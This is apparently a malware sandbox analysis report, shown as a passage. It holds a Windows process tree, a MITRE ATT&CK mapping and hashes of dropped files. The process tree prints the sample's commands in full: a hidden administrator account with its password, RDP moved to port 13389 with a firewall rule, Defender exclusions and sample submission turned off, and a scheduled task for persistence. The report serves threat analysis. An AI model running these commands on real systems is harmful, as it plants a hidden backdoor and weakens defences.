                                          cscript.exe "C:\Users\Admin\AppData\Roaming\UFsvtvN\129.vbs" "C:\Users\Admin\AppData\Roaming\UFsvtvN\786.vbs" "VWpGb2JGQlZTbnBrVld4NlYxZFdRMUp0Vlcxa1IwNU9ZMVF4V1ZVd1VqTlNWemswVVRKc00wcHRPVEprYms1MFVsWnJPV1Y2ClFrWlJlbFpEVVdwR1JVeFVZelZTYWtGMENrNUVVWGxSYVRBMVVXdFZORXhVV1hoT2EwVjVUMVJHUjA5RlRrZE5TREE5" "C:\Users\Admin\AppData\Roaming\UFsvtvN\bSR.dll"
                                          8⤵
                                            PID:3908
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\UFsvtvN\bSR.dll" /tn "MySQLNotifierTask45"
                                          7⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:4900
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\UFsvtvN\bSR.dll" /tn "MySQLNotifierTask45"
                                            8⤵
                                            • System Location Discovery: System Language Discovery
                                            • Scheduled Task/Job: Scheduled Task
                                            PID:788
                                  • C:\Windows\SysWOW64\PING.EXE
                                    ping 127.0.0.1 -n 30
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    • System Network Configuration Discovery: Internet Connection Discovery
                                    • Runs ping.exe
                                    PID:1248
                            • C:\Windows\System32\svchost.exe
                              C:\Windows\System32\svchost.exe -k NetworkService -s TermService
                              1⤵
                                PID:1076
                              • C:\Windows\System32\svchost.exe
                                C:\Windows\System32\svchost.exe -k NetworkService -s TermService
                                1⤵
                                • Loads dropped DLL
                                • Suspicious behavior: EnumeratesProcesses
                                PID:4544
                              • C:\Windows\System32\svchost.exe
                                C:\Windows\System32\svchost.exe -k NetworkService -s TermService
                                1⤵
                                  PID:2056
                                • C:\Windows\System32\svchost.exe
                                  C:\Windows\System32\svchost.exe -k NetworkService -s TermService
                                  1⤵
                                  • Loads dropped DLL
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:228
                                • C:\Windows\System32\svchost.exe
                                  C:\Windows\System32\svchost.exe -k NetworkService -s TermService
                                  1⤵
                                  • Loads dropped DLL
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:4908
                                • C:\Windows\System32\WScript.exe
                                  C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Roaming\UFsvtvN\589.vbs" BsuIsYeBFe XSDwEoxCiw "C:\Users\Admin\AppData\Roaming\UFsvtvN\GUICcTpn.bat"
                                  1⤵
                                  • Checks computer location settings
                                  PID:4772
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Roaming\UFsvtvN\GUICcTpn.bat
                                    2⤵
                                    • Drops file in System32 directory
                                    PID:1528
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-544" get name /value"
                                      3⤵
                                        PID:2420
                                        • C:\Windows\System32\Wbem\WMIC.exe
                                          wmic group where sid="S-1-5-32-544" get name /value
                                          4⤵
                                            PID:1076
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-555" get name /value"
                                          3⤵
                                            PID:4328
                                            • C:\Windows\System32\Wbem\WMIC.exe
                                              wmic group where sid="S-1-5-32-555" get name /value
                                              4⤵
                                                PID:4764
                                            • C:\Windows\system32\net.exe
                                              net user BsuIsYeBFe XSDwEoxCiw /add
                                              3⤵
                                                PID:3136
                                                • C:\Windows\system32\net1.exe
                                                  C:\Windows\system32\net1 user BsuIsYeBFe XSDwEoxCiw /add
                                                  4⤵
                                                    PID:4540
                                                • C:\Windows\system32\net.exe
                                                  net localgroup Administrators BsuIsYeBFe /add
                                                  3⤵
                                                    PID:1352
                                                    • C:\Windows\system32\net1.exe
                                                      C:\Windows\system32\net1 localgroup Administrators BsuIsYeBFe /add
                                                      4⤵
                                                        PID:4876
                                                    • C:\Windows\system32\net.exe
                                                      net localgroup Remote Desktop Users BsuIsYeBFe /add
                                                      3⤵
                                                        PID:4532
                                                        • C:\Windows\system32\net1.exe
                                                          C:\Windows\system32\net1 localgroup Remote Desktop Users BsuIsYeBFe /add
                                                          4⤵
                                                            PID:4904
                                                        • C:\Windows\system32\net.exe
                                                          net accounts /maxpwage:unlimited
                                                          3⤵
                                                            PID:2424
                                                            • C:\Windows\system32\net1.exe
                                                              C:\Windows\system32\net1 accounts /maxpwage:unlimited
                                                              4⤵
                                                                PID:4044
                                                            • C:\Windows\system32\reg.exe
                                                              reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v BsuIsYeBFe /t REG_DWORD /d "00000000" /f
                                                              3⤵
                                                              • Hide Artifacts: Hidden Users
                                                              PID:4188
                                                            • C:\Windows\system32\reg.exe
                                                              reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "PortNumber" /t REG_DWORD /d 13389 /f
                                                              3⤵
                                                                PID:876
                                                              • C:\Windows\system32\netsh.exe
                                                                netsh advfirewall firewall add rule name="RDP Port 13389" profile=any protocol=TCP action=allow dir=in localport=13389
                                                                3⤵
                                                                • Modifies Windows Firewall
                                                                • Event Triggered Execution: Netsh Helper DLL
                                                                PID:4192
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -Command Add-MpPreference -ExclusionPath "$env:ProgramFiles"
                                                                3⤵
                                                                • Command and Scripting Interpreter: PowerShell
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                PID:2748
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -Command Add-MpPreference -ExclusionPath "$env:Appdata"
                                                                3⤵
                                                                • Command and Scripting Interpreter: PowerShell
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                PID:1476
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend
                                                                3⤵
                                                                • Command and Scripting Interpreter: PowerShell
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                PID:1780
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -Command Add-MpPreference -ExclusionProcess "C:\Windows\System32\wscript.exe"
                                                                3⤵
                                                                • Command and Scripting Interpreter: PowerShell
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                PID:1920
                                                              • C:\Windows\system32\timeout.exe
                                                                Timeout /t 15
                                                                3⤵
                                                                • Delays execution with timeout.exe
                                                                PID:4080
                                                          • C:\Windows\System32\WScript.exe
                                                            C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Roaming\UFsvtvN\786.vbs" VWpGb2JGQlZTbnBrVld4NlYxZFdRMUp0Vlcxa1IwNU9ZMVF4V1ZVd1VqTlNWemswVVRKc00wcHRPVEprYms1MFVsWnJPV1Y2ClFrWlJlbFpEVVdwR1JVeFVZelZTYWtGMENrNUVVWGxSYVRBMVVXdFZORXhVV1hoT2EwVjVUMVJHUjA5RlRrZE5TREE5
                                                            1⤵
                                                            • Blocklisted process makes network request
                                                            PID:2828

                                                          Network

                                                          MITRE ATT&CK Enterprise v15

                                                          Reconnaissance

                                                          Resource Development

                                                          Initial Access

                                                          Execution

                                                          Command and Scripting Interpreter

                                                          1
                                                          T1059

                                                          PowerShell

                                                          1
                                                          T1059.001

                                                          Scheduled Task/Job

                                                          1
                                                          T1053

                                                          Scheduled Task

                                                          1
                                                          T1053.005

                                                          Persistence

                                                          Account Manipulation

                                                          1
                                                          T1098

                                                          Boot or Logon Autostart Execution

                                                          1
                                                          T1547

                                                          Winlogon Helper DLL

                                                          1
                                                          T1547.004

                                                          Create or Modify System Process

                                                          1
                                                          T1543

                                                          Windows Service

                                                          1
                                                          T1543.003

                                                          Event Triggered Execution

                                                          1
                                                          T1546

                                                          Netsh Helper DLL

                                                          1
                                                          T1546.007

                                                          Scheduled Task/Job

                                                          1
                                                          T1053

                                                          Scheduled Task

                                                          1
                                                          T1053.005

                                                          Server Software Component

                                                          1
                                                          T1505

                                                          Terminal Services DLL

                                                          1
                                                          T1505.005

                                                          Privilege Escalation

                                                          Account Manipulation

                                                          1
                                                          T1098

                                                          Boot or Logon Autostart Execution

                                                          1
                                                          T1547

                                                          Winlogon Helper DLL

                                                          1
                                                          T1547.004

                                                          Create or Modify System Process

                                                          1
                                                          T1543

                                                          Windows Service

                                                          1
                                                          T1543.003

                                                          Event Triggered Execution

                                                          1
                                                          T1546

                                                          Netsh Helper DLL

                                                          1
                                                          T1546.007

                                                          Scheduled Task/Job

                                                          1
                                                          T1053

                                                          Scheduled Task

                                                          1
                                                          T1053.005

                                                          Defense Evasion

                                                          Hide Artifacts

                                                          1
                                                          T1564

                                                          Hidden Users

                                                          1
                                                          T1564.002

                                                          Impair Defenses

                                                          1
                                                          T1562

                                                          Disable or Modify System Firewall

                                                          1
                                                          T1562.004

                                                          Modify Registry

                                                          1
                                                          T1112

                                                          Credential Access

                                                          Credentials from Password Stores

                                                          1
                                                          T1555

                                                          Credentials from Web Browsers

                                                          1
                                                          T1555.003

                                                          Unsecured Credentials

                                                          1
                                                          T1552

                                                          Credentials In Files

                                                          1
                                                          T1552.001

                                                          Discovery

                                                          Password Policy Discovery

                                                          1
                                                          T1201

                                                          Permission Groups Discovery

                                                          1
                                                          T1069

                                                          Local Groups

                                                          1
                                                          T1069.001

                                                          Query Registry

                                                          1
                                                          T1012

                                                          Remote System Discovery

                                                          1
                                                          T1018

                                                          System Information Discovery

                                                          2
                                                          T1082

                                                          System Location Discovery

                                                          1
                                                          T1614

                                                          System Language Discovery

                                                          1
                                                          T1614.001

                                                          System Network Configuration Discovery

                                                          1
                                                          T1016

                                                          Internet Connection Discovery

                                                          1
                                                          T1016.001

                                                          Lateral Movement

                                                          Remote Service Session Hijacking

                                                          1
                                                          T1563

                                                          RDP Hijacking

                                                          1
                                                          T1563.002

                                                          Remote Services

                                                          1
                                                          T1021

                                                          Remote Desktop Protocol

                                                          1
                                                          T1021.001

                                                          Collection

                                                          Data from Local System

                                                          1
                                                          T1005

                                                          Command and Control

                                                          Web Service

                                                          1
                                                          T1102

                                                          Exfiltration

                                                          Impact

                                                          Replay Monitor

                                                          Loading Replay Monitor...

                                                          Downloads

                                                          • C:\Program Files\RDP Wrapper\RDPWInst.exe
                                                            Filesize

                                                            1.4MB

                                                            MD5

                                                            3288c284561055044c489567fd630ac2

                                                            SHA1

                                                            11ffeabbe42159e1365aa82463d8690c845ce7b7

                                                            SHA256

                                                            ac92d4c6397eb4451095949ac485ef4ec38501d7bb6f475419529ae67e297753

                                                            SHA512

                                                            c25b28a340a23a9fa932aa95075f85fdd61880f29ef96f5179097b652f69434e0f1f8825e2648b2a0de1f4b0f9b8373080a22117974fcdf44112906d330fca02

                                                            Download Submit

                                                          • C:\Program Files\RDP Wrapper\rdpwrap.bat
                                                            Filesize

                                                            12KB

                                                            MD5

                                                            b365fde3be7855f4254d1e4bba45d260

                                                            SHA1

                                                            b56c6f0402b25c5d68e3a722144f5f4b5bb53d27

                                                            SHA256

                                                            2a175e17c98f9d5f436e23d1c9670f36e54cb82269bccddc87dcfbcfb04d1360

                                                            SHA512

                                                            d08e261c0f5c18041d005029cc6ed6119a8cc446607bb5f683a059d1a193d8e04d3e0b52c9f2ea871fcfa8e043c5c2886cfce5419eaf37c39003236f7a399026

                                                            Download Submit

                                                          • C:\Program Files\RDP Wrapper\rdpwrap_new.ini
                                                            Filesize

                                                            181KB

                                                            MD5

                                                            12afc3fd401d3724956283c33eb796eb

                                                            SHA1

                                                            66b875153e6ee45c76ae374a95e2cec013ac94e8

                                                            SHA256

                                                            370681b06f7f69461f745e0ef232c7e69aa6b91a9322903ea1150ba8b2eca120

                                                            SHA512

                                                            d9957669907fb20b3a3c12770574bacc51de14de8bce426292a0c95131fb354ab369e12303c01b8d3dc394ac3e30371b2d2c3744840a86b296f8938f747cffa4

                                                            Download Submit

                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_49536AB5156BDD74EFF881D01C36A419
                                                            Filesize

                                                            471B

                                                            MD5

                                                            eb4b4f9fa16909112f5a8f9654620337

                                                            SHA1

                                                            0bae7b32d406005fd45bff16bc05e6b1cace5cc7

                                                            SHA256

                                                            c350c1fa26742f2393ee665608a905c6300ff39eb49bc11d1e0a33a5362bf59f

                                                            SHA512

                                                            4a35e295293c7389c2bd38b848078dae20ca48f98d8257021b240951ec16c978b8dd4ccdd69d304909a02d7b0062c8a7435e3ee1e8770ee5e11684331154ddf3

                                                            Download Submit

                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_49536AB5156BDD74EFF881D01C36A419
                                                            Filesize

                                                            412B

                                                            MD5

                                                            b201caf6c8471e3eebb5d6dea54aa939

                                                            SHA1

                                                            11b4fb249887c2c780281773ef648bd6018bc5e1

                                                            SHA256

                                                            ae9d5357b3dcab5fa597337aa0a5769296d8d77af34fd0f5b55212330dd91843

                                                            SHA512

                                                            af298c3eb19fa33ed7819e622da4bc9d4872975efbbce59fba77ab913e7b0c837ae8283265554483f612c116e01f0a248b2cd9588d5042e9aeefc3808439e375

                                                            Download Submit

                                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
                                                            Filesize

                                                            2KB

                                                            MD5

                                                            ba246bd2d86f16b8e701e797989d424b

                                                            SHA1

                                                            048769be2e48bd66ddedbfcf9d40addb6168fc16

                                                            SHA256

                                                            37c38ce312bc65167a7a6208217dedc66559bd6dd149472fd7001a8e9db310ad

                                                            SHA512

                                                            473fedc38e188d36b1f2f3db119a5c6c1e8676a24392a64b60198ab38c6725a909b8564892608760cc2dfc6a1b4f72cf4370740f97dcb0722d3fd4e0faa57bec

                                                            Download Submit

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                            Filesize

                                                            18KB

                                                            MD5

                                                            6cde20e3e0bd34f0784316814fca9234

                                                            SHA1

                                                            9bc7d4a1998c024433f801a767678cca7776a288

                                                            SHA256

                                                            ec1f3a6d3405912f6e121dd3298036919a113fb21b97c7c67829711f3bc6975e

                                                            SHA512

                                                            9109eeba074b8d1291684c821006b38a410042e4c247f6d749f7edd6df6b891fd53026c99c2b528c62683ea19780193d04b3541d62ac8465a6c4fba503d71fe4

                                                            Download Submit

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                            Filesize

                                                            18KB

                                                            MD5

                                                            052adb3bca4b5d577115b85a20102dd1

                                                            SHA1

                                                            25e84c6bc9b0a2d963c948cb76e2ff1feaee5d2e

                                                            SHA256

                                                            c6faf77fba2e1532a83199bb6144634c80c8132b8799585e7c09bad00c3cb56b

                                                            SHA512

                                                            1aec3eb587b4d2347abdf0aa9d9fb44824a73e9db3e5feb84551a25e78b4668263dab4e8c102b08e5ca5d398b8cbdba1e843bec524d2949b0bb58dd2cbc08a27

                                                            Download Submit

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                            Filesize

                                                            18KB

                                                            MD5

                                                            296cea8fecaa1c84fca65032655216ba

                                                            SHA1

                                                            5c09ec39e1cc67550d9fe7e6dbe9956bc3439f45

                                                            SHA256

                                                            bb66f62836ba3b506a692e8555395111081b9f35cb6e93dd502779090bc9ba46

                                                            SHA512

                                                            8d3ab339826382e7191f524ccb4ea7abd29536e59e56cb74391966de9ae15acad2d2496a6eb71b90d002fa0675e4f9cf578336c9b3f381af6404a9979445ce70

                                                            Download Submit

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                            Filesize

                                                            18KB

                                                            MD5

                                                            454a728332692962aa807f79f52abc20

                                                            SHA1

                                                            947b4dd59e8dea255e80dfc48d2d3fbe75922a86

                                                            SHA256

                                                            e611cbe4670f8ffd6a6d7fdcdf970e11e50259ac5ab226ae82b41ef21043ffc6

                                                            SHA512

                                                            45349c3c3e1beb1618b0687bbe082ac0680f23543a9ac27394142fbca39dcc27d5505ba6a9c52631ace4257f5491cd3c1ec63f5a7a7d5eb4861212f9a7cd978a

                                                            Download Submit

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                            Filesize

                                                            18KB

                                                            MD5

                                                            7a3d27797f1fbb1718aeea4a1dcb7d16

                                                            SHA1

                                                            c6f1b6bf30b11bbac14067a94557a439d4882607

                                                            SHA256

                                                            82d607de468ad41dd1fa06752c92c6bc8240ebc9d0bd090171f051bb4b87fd5c

                                                            SHA512

                                                            1252ed8e68bd4c30f30c45cbee37a8f8cdd8c0be7478c4c4db101278c59f87581fd69b442174daf455e0a101b6d49a064d673932ae8bca1b470d580ead145f65

                                                            Download Submit

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                            Filesize

                                                            18KB

                                                            MD5

                                                            505c0cefae83f0f26146bbb02c25fb69

                                                            SHA1

                                                            45bddc4f0d3f9db3d7b37d939885490d1c9e5365

                                                            SHA256

                                                            6f33ab91afedb5dfcf6b857e7769eb2f18d35810868002393f1c49c01459ea9e

                                                            SHA512

                                                            1fe04718ef47a93d35298792ba01db5400db5894c5509288eadccdca88e39232d11499992f16e42471b53b9d09e603fd64a2f6e9248ecd491a960cc793e11bdf

                                                            Download Submit

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                            Filesize

                                                            18KB

                                                            MD5

                                                            ce2a869bad03dfa19128278dea57a3f5

                                                            SHA1

                                                            643a4424b4e7993a9c2a57916ecd8753a29028f3

                                                            SHA256

                                                            eee2fcb18a1a5128a6d1b37b50a246d546d83b7ac8fa2689b34afb24a630da5e

                                                            SHA512

                                                            de19fbf07eba90131e912fd7374d56b803c690dd6c9222a5b6b3af8da903d80c40848b2fbfa56929e494d12c0a57760e61b1db3d3eee5c230eb9b815f8c2b2d7

                                                            Download Submit

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                            Filesize

                                                            18KB

                                                            MD5

                                                            d5c6e923f5d1305932aad16729f11c2d

                                                            SHA1

                                                            aa07e24d6a56ba43516a79f8eac17eee197b0093

                                                            SHA256

                                                            39d092e1ead713d3abf27f251e1d39bd2b58c3e5cb53c768f4c0c6eb54e3e891

                                                            SHA512

                                                            53e2c4f43540c03e3228bb30e4c65201c4836756e6d9b3dd19754b7d3843ba6db28ea07eec3a50ba83a098f6239b2ed7adfe8a4c050717e1c2194b538b89075a

                                                            Download Submit

                                                          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zhumzble.j23.ps1
                                                            Filesize

                                                            60B

                                                            MD5

                                                            d17fe0a3f47be24a6453e9ef58c94641

                                                            SHA1

                                                            6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                            SHA256

                                                            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                            SHA512

                                                            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                            Download Submit

                                                          • C:\Users\Admin\AppData\Roaming\UFsvtvN\1167.vbs
                                                            Filesize

                                                            9KB

                                                            MD5

                                                            fdc134c640049724853a14b692623719

                                                            SHA1

                                                            500ff9c4e30c34e4ab0ac0ce7c32e5f9116020a5

                                                            SHA256

                                                            dc42333f20b3a524dc7d7a1c3301188d36642fb077758c2ab4d824a0439ecd00

                                                            SHA512

                                                            1b34d84d77cad63d69fcae45735c3616ff6bcac2176bfef1ce4e6d08f4bffa98a48aaa036b3f9674d516d923a353bc339290f7204436de9971e7b2ebf60f407f

                                                            Download Submit

                                                          • C:\Users\Admin\AppData\Roaming\UFsvtvN\129.vbs
                                                            Filesize

                                                            2KB

                                                            MD5

                                                            e526da1842354849cfc018128001a6b4

                                                            SHA1

                                                            921f1ab5499eb550a351d4a394bd44df5d173ea5

                                                            SHA256

                                                            563dd781dd63543f7ee67747f044fbd77877cd46e34df7de1c96f287eeb39b14

                                                            SHA512

                                                            79b4f306f9d89af12441fb6df2221a0ff8b9124ff23fadca037ed2319eb6a989bc94595598c49b61ed2e8dc12015b68190e59b7658eeaf1825d8d37de2586865

                                                            Download Submit

                                                          • C:\Users\Admin\AppData\Roaming\UFsvtvN\25.vbs
                                                            Filesize

                                                            2KB

                                                            MD5

                                                            193242114c1738d0ea04aa93659fdd5a

                                                            SHA1

                                                            a929cc1cfbe44ba8a99117dfd7819776ab45d465

                                                            SHA256

                                                            c879379224bc8dc4a4f495f989711714a936892b11e7a1cf6e7b79654dc8f928

                                                            SHA512

                                                            46825c3cc42c3c2e86a3890b29b3a2cf9b30e892d0d38bfb2e3334ffa3951b8f732b2786bdffa528ee6ff05c789c35e963f069d54680c3e16735165072e6fec4

                                                            Download Submit

                                                          • C:\Users\Admin\AppData\Roaming\UFsvtvN\329.vbs
                                                            Filesize

                                                            2KB

                                                            MD5

                                                            d427d2ed9db86d08b38f5f8b5eec4493

                                                            SHA1

                                                            5cfe9f751bad99009abf1a642eec8f7c67870051

                                                            SHA256

                                                            7d0cb57ba7d2af6ff75a9c203d1338ce31199d07eeca391e9a82fedcbe068512

                                                            SHA512

                                                            fc381ec4b2dcdfd10d55d5d317e7a6011da9a859a7e98a84d49391637aa22eaf983875c9bf5bad8403b006566d4053d8f8946d3cbd52a433eac60c26f73cf659

                                                            Download Submit

                                                          • C:\Users\Admin\AppData\Roaming\UFsvtvN\589.vbs
                                                            Filesize

                                                            2KB

                                                            MD5

                                                            0884b6e1aaf279208fe5f97cbfa85276

                                                            SHA1

                                                            388f310a0d62a3362db22659e93cb6cb517c21b8

                                                            SHA256

                                                            490c84854174fa43f15d9ca2967578ed5aa614f5327ccccb5cb6ba589db3aeb6

                                                            SHA512

                                                            68d515e3660306e7e6c7a5661b41232e6a19788ef05d614962f64873056dcc8a5489c4d1ac22ad2e3f632d6c4e7497a40d0511527f0ac1a8e0dff7366731eead

                                                            Download Submit

                                                          • C:\Users\Admin\AppData\Roaming\UFsvtvN\786.vbs
                                                            Filesize

                                                            3KB

                                                            MD5

                                                            4b48e917e7d8cb65b43fac439a3e9e16

                                                            SHA1

                                                            72da241d20a8ea319363a52ec9c2f3eb82e57fb1

                                                            SHA256

                                                            475ad057cf0aeb679a0802391f3b799d8673d95a410efa5b9df933896ec6eeef

                                                            SHA512

                                                            6145cb081886993d27cdc15ce2076ca2221c52d27bd1a54e390cbc303c74a56d47e9785ffa8fc4989cb864a3ac2777d98d469ab7e0ca0072ac57f837777bd5e8

                                                            Download Submit

                                                          • C:\Users\Admin\AppData\Roaming\UFsvtvN\GUICcTpn.bat
                                                            Filesize

                                                            1KB

                                                            MD5

                                                            846d680e864cd2606699e8ec9ac741d9

                                                            SHA1

                                                            73461395a60999c0192b3354b3ddb0598117d8ac

                                                            SHA256

                                                            b2ac4a063cc12f49ef2847c3cca31b001460c4af3b2da90d6507e5bb92edda00

                                                            SHA512

                                                            3bd3b8bca35573b68a427b66fc95a509f7e5d7aab81e350865a8fd3862d765247c64387b97a804b418c7a170733f62c46f61314bff74a71bb0b4999ceb55fed4

                                                            Download Submit

                                                          • C:\Users\Admin\AppData\Roaming\UFsvtvN\bSR.dll
                                                            Filesize

                                                            1KB

                                                            MD5

                                                            a1137415da39d87b2fcafab749ea19c2

                                                            SHA1

                                                            8dcd904266debebc3e40ac08d9d587fc0b485315

                                                            SHA256

                                                            1867737e9a64ff883768e7861241f391d2ef01b9f82a0e8abd041757056d59db

                                                            SHA512

                                                            e61b3a2b621ad9b6fb0c3053319f5f01be6b124e30789ebbb432bbc54767dd6544cd745bcd402a5fc082b6f0c080c6b6ccc53741b0d533418a6d4a6328dfd196

                                                            Download Submit

                                                          • C:\Users\Admin\AppData\Roaming\UFsvtvN\bSR.dll
                                                            Filesize

                                                            837B

                                                            MD5

                                                            f5e004628f307168321434b6a91a529b

                                                            SHA1

                                                            00d001de6795a30c3d4c29f30eb261aa7435e53f

                                                            SHA256

                                                            c520dd6dca0ef5cbdadd13a1162b4503dd97b8cf99558947bc01e6009129bafe

                                                            SHA512

                                                            eea7c3a476801809a02b0a000265e2d424f8b7f8dae09138730636f47137fbc1db65234134279a3c4ce5947743869f9044e57212c0f5803ac9871972177fc18d

                                                            Download Submit

                                                          • C:\Users\Admin\AppData\Roaming\UFsvtvN\bSR.dll
                                                            Filesize

                                                            942B

                                                            MD5

                                                            3586aae409d659bdc98e2457091469ca

                                                            SHA1

                                                            8b585648fbd020efeb27189024215f3876ecfe74

                                                            SHA256

                                                            6f9d4c2ba2464458b20cf64ccef24ad84e558e9b78280c156640ca5624b3b65c

                                                            SHA512

                                                            d1c8705d988f6e7a196e5e37121a8de0e77d3219b6b955f9e87c9ed9a49cda63058cbc3d218d506e3db18a8453f9135c377d0db767364865eca395f55c0c100b

                                                            Download Submit

                                                          • C:\Users\Admin\AppData\Roaming\UFsvtvN\pNvTxatFeC.bat
                                                            Filesize

                                                            1KB

                                                            MD5

                                                            6d19b2702b77a20b89818484cbc83506

                                                            SHA1

                                                            f42dbd3ab3c60ea9952e2a0f66826e153f89d943

                                                            SHA256

                                                            042ef6e3349edef436e425a5ec5d7c23f49a93f2866ae31c10ada08e9e012d5f

                                                            SHA512

                                                            184e47c8aaa2e8a391e08ba2c5932c6a16b620303c4c985df9e149770a866e8e3948a027150070044cdb56adfb11ad8b8cbd5979e78a0fbf444868cab9b4a285

                                                            Download Submit

                                                          • C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Abbassando.xltx
                                                            Filesize

                                                            1.0MB

                                                            MD5

                                                            e8b84f9aae8f56157bab0cb0ca34fe45

                                                            SHA1

                                                            08f3fae0a026c59d42d698eeceb2cde4cb5cc83e

                                                            SHA256

                                                            276c2faaae669568b7655862d1aa85c7b711df06a4bea1cce5f6f5578d9d440e

                                                            SHA512

                                                            03d80a1a53daa470f6a684f84609b3f744e524300fb6f7e693f0d102bd77ac1d140da200cb4b3df86e0477826bbd7eaba10a8e10d68b6ce378b55384cb18430a

                                                            Download Submit

                                                          • C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Attesa.xltx
                                                            Filesize

                                                            1.1MB

                                                            MD5

                                                            1cbc6a4ec6699390f807eaca769b9e9e

                                                            SHA1

                                                            265b0640a35ce9a161ec4c0cad5142d5cf7e9feb

                                                            SHA256

                                                            747cfe4985ce5203e973f9be6ac7e43c6980babcb7203f1c989469670feec350

                                                            SHA512

                                                            19fcba9aa6fa052c7ef032f694313b153835a78bbc7072b54f41f3ef9c8985a70b67c7de968312793c2a644d55411f0a058aab955945322069191b746ca44b47

                                                            Download Submit

                                                          • C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Esistenza.xltx
                                                            Filesize

                                                            1.0MB

                                                            MD5

                                                            6c1b9b74d09b572db467629a0e4d3eec

                                                            SHA1

                                                            a38508ddc0d932690f416532ddbd32ee4375b164

                                                            SHA256

                                                            70b96681d633c392bd6b2782128ee018bbe2eedb1ab565784db6016f1401f609

                                                            SHA512

                                                            3515105e577255827e26b28bbcd79219bf5598809d526481b34dcb645bb54827d7680b2ee9cb82036cfefbc636211b66f73efc63a9a99e09cbb45ffbf5230b5c

                                                            Download Submit

                                                          • C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Facilita.xltx
                                                            Filesize

                                                            1.9MB

                                                            MD5

                                                            f07ba54d61e8ecd234cfc29dbd63c082

                                                            SHA1

                                                            2959ab5302060059db4c12af0ff9aa5c8d060499

                                                            SHA256

                                                            17b8e05da75af68ae79999fb70d3031cbfc92ffaa6862e8b6bb6f9cee11a100a

                                                            SHA512

                                                            b4ab41d0c0d26b79418a96a926217540e6c784fa87f6625416c39280245773ddf3c84c671fc5e1a9a79a628b12b79c09f34e4ca50fdded172b1add790c3f5864

                                                            Download Submit

                                                          • C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Mio.xltx
                                                            Filesize

                                                            921KB

                                                            MD5

                                                            a2a838e2b4d650fc8f8f59408183684a

                                                            SHA1

                                                            90c5b4ed3cb75b7ce6d3fb201d53bcb83fc812a1

                                                            SHA256

                                                            ad7dc09b1a02ac60bc7fca76a294dfa5499af0ba7a840ff845c042cbac875e57

                                                            SHA512

                                                            226dd3f5697759bed3926483966b0e71287526dd2308a460239e6cc215dce20a4bb06505969c30efbea5000c135bc2c3eb5b6b1bdb6a17b6cb748e9783336027

                                                            Download Submit

                                                          • C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Potere.exe.com
